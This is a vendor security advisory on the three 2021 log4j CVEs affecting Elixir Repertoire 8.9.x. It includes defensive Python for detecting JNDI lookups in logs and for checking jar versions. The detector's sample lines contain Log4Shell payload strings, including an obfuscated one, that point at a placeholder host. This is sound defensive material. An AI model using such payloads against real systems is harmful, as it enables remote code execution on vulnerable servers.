[Repertoire 8.x]: Zero-day exploits and vulnerabilities in log4j 2.x

This entry covers the three log4j vulnerabilities with the CVE IDs CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105.

Reference Links:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105


Description:
[CVE-2021-44228, log4j] - A Zero-day exploit
JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

[CVE-2021-45046, log4j]
The fix to address CVE-2021-44228 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with either a Context Lookup or a Thread Context Map pattern, attackers with control over Thread Context Map (MDC) input data can cause a Denial of Service (DoS).

[CVE-2021-45105, log4j]
Apache log4j2 versions 2.0-alpha1 through 2.16.0 (excl. 2.12.3) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted.
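All three CVEs above hinge on log4j evaluating ${...} lookup strings that reach it through attacker-influenced input. The script below is an added example for defenders (it is not part of this advisory or of Elixir Repertoire) that scans log lines for JNDI lookups before they would be interpreted, normalising the nested lower/upper/default lookup forms that log4j itself evaluates so that a split-up lookup is still recognised. The log lines are constructed samples; the hostname example.invalid is a placeholder.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample lines (e.g. from a web access log whose User-Agent field is
# attacker-controlled and later written through log4j). Not from the advisory.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/x}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://example.invalid/y}"',
    '10.0.0.3 - - "GET / HTTP/1.1" 200 "${ctx:loginId}"',
]

# Innermost lookup: a ${...} whose body contains no further $, { or }.
INNER_LOOKUP = re.compile(r"\$\{(?P<body>[^${}]*)\}")
# What we are looking for once nesting has been flattened.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(body: str) -> Optional[str]:
    """Evaluate the nested lookup forms log4j would evaluate; None if unknown."""
    prefix, _, rest = body.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    # ${name:-default} yields the default when 'name' is undefined.
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None  # e.g. ${ctx:...}: leave untouched


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Repeatedly collapse innermost lookups until nothing more resolves."""
    for _ in range(max_rounds):
        def repl(m: "re.Match[str]") -> str:
            resolved = _resolve_inner(m.group("body"))
            return m.group(0) if resolved is None else resolved

        new_text = INNER_LOOKUP.sub(repl, text)
        if new_text == text:
            break
        text = new_text
    return text


def is_jndi_lookup(line: str) -> bool:
    """True if the line contains a JNDI lookup after normalisation."""
    return bool(JNDI_LOOKUP.search(normalize_lookups(line)))


def find_jndi_lookups(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, line) for every line carrying a JNDI lookup."""
    return [(i, line) for i, line in enumerate(lines, 1) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for lineno, line in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {lineno}: JNDI lookup detected: {line}")
```

This is a detection aid, not a substitute for the upgrade: a match means a lookup string reached your logs, which on an affected log4j version would have been evaluated.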


Affected log4j versions:

  • All Apache log4j versions from 2.0-beta9 to 2.16.0
    >= 2.0-beta9 <= 2.16.0
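To check whether a deployment falls inside the range listed above, the following added example (not from this advisory or from Elixir Repertoire) compares log4j version strings, including pre-release qualifiers such as 2.0-beta9, and scans a directory for log4j-core jars, reading the version from the Maven pom.properties inside each jar. The jars written by demo() are constructed stubs containing only that properties file.

```python
import re
import tempfile
import zipfile
from pathlib import Path
from typing import Dict, Optional, Tuple

# Pre-release qualifiers sort before the final release of the same number:
# 2.0-alpha1 < 2.0-beta9 < 2.0-rc1 < 2.0 < 2.0.1
QUALIFIER_RANK = {"alpha": 0, "beta": 1, "rc": 2}
RELEASE_RANK = 3
VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(?:-([A-Za-z]+)(\d*))?$")


def version_key(version: str) -> Tuple[Tuple[int, ...], int, int]:
    """Turn a log4j version string into a tuple that compares correctly."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    nums = tuple(int(x) for x in m.group(1).split("."))
    nums += (0,) * (3 - len(nums))  # pad "2.0" to (2, 0, 0)
    qualifier, qnum = m.group(2), m.group(3)
    if qualifier is None:
        return (nums, RELEASE_RANK, 0)
    rank = QUALIFIER_RANK.get(qualifier.lower())
    if rank is None:
        raise ValueError(f"unknown pre-release qualifier in {version!r}")
    return (nums, rank, int(qnum or 0))


# The range exactly as the advisory states it: >= 2.0-beta9 and <= 2.16.0
AFFECTED_LOW = version_key("2.0-beta9")
AFFECTED_HIGH = version_key("2.16.0")


def is_affected(version: str) -> bool:
    return AFFECTED_LOW <= version_key(version) <= AFFECTED_HIGH


def version_from_jar(jar_path: Path) -> Optional[str]:
    """Read the log4j-core version from pom.properties inside the jar;
    fall back to the version embedded in the file name (log4j-core-<ver>.jar)."""
    with zipfile.ZipFile(jar_path) as jar:
        for name in jar.namelist():
            if name.endswith("org.apache.logging.log4j/log4j-core/pom.properties"):
                for line in jar.read(name).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        return line.split("=", 1)[1].strip()
    m = re.match(r"log4j-core-(.+)\.jar$", jar_path.name)
    return m.group(1) if m else None


def scan_directory(root: Path) -> Dict[str, Optional[bool]]:
    """Map each log4j-core jar under root to True (affected), False, or None (unknown)."""
    results: Dict[str, Optional[bool]] = {}
    for jar in root.rglob("log4j-core-*.jar"):
        ver = version_from_jar(jar)
        results[jar.name] = is_affected(ver) if ver else None
    return results


def build_constructed_jar(directory: Path, version: str) -> Path:
    """Write a minimal constructed jar holding only pom.properties (demo input)."""
    directory.mkdir(parents=True, exist_ok=True)
    path = directory / f"log4j-core-{version}.jar"
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr(
            "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties",
            f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n",
        )
    return path


def demo() -> Dict[str, Optional[bool]]:
    """Build a few constructed jars in a temporary tree and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        lib = Path(tmp) / "lib"
        for v in ("2.0-beta9", "2.14.1", "2.16.0", "2.17.1"):
            build_constructed_jar(lib, v)
        return scan_directory(Path(tmp))


if __name__ == "__main__":
    for name, affected in sorted(demo().items()):
        print(f"{name}: {'AFFECTED' if affected else 'not in range'}")
```

Reading pom.properties rather than trusting the file name matters because repackaged or renamed jars are common in application bundles; a jar with neither a pom.properties nor a versioned name is reported as None so it can be inspected by hand.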

Resolution:

  • Upgrade to Elixir Repertoire v8.10.0, which replaces log4j with logback and maintains JDK compatibility.
  Affected Version           Upgrade Version
  Elixir Repertoire 8.9.0    Elixir Repertoire 8.10.0
  Elixir Repertoire 8.9.1    Elixir Repertoire 8.10.0

Contact sales@elixirtech.com if your project uses one of the affected versions to obtain the updated product builds that address the above exploits and vulnerabilities.